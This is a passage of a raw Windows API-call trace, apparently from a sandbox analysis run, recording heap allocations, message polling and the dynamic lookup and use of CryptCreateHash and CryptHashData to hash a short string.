1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.077] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0210.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e509c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.078] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.079] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.079] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54dd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.079] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0210.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c68 [0210.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.082] CryptHashData (hHash=0xa87590, pbData=0x2e54e98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.083] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.083] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0210.083] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: 